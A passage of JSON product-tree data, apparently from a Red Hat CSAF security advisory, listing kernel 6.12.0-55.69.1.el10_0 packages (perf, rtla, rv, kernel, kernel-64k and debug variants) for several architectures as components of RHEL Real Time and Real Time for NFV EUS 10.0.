"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.src as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.src",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
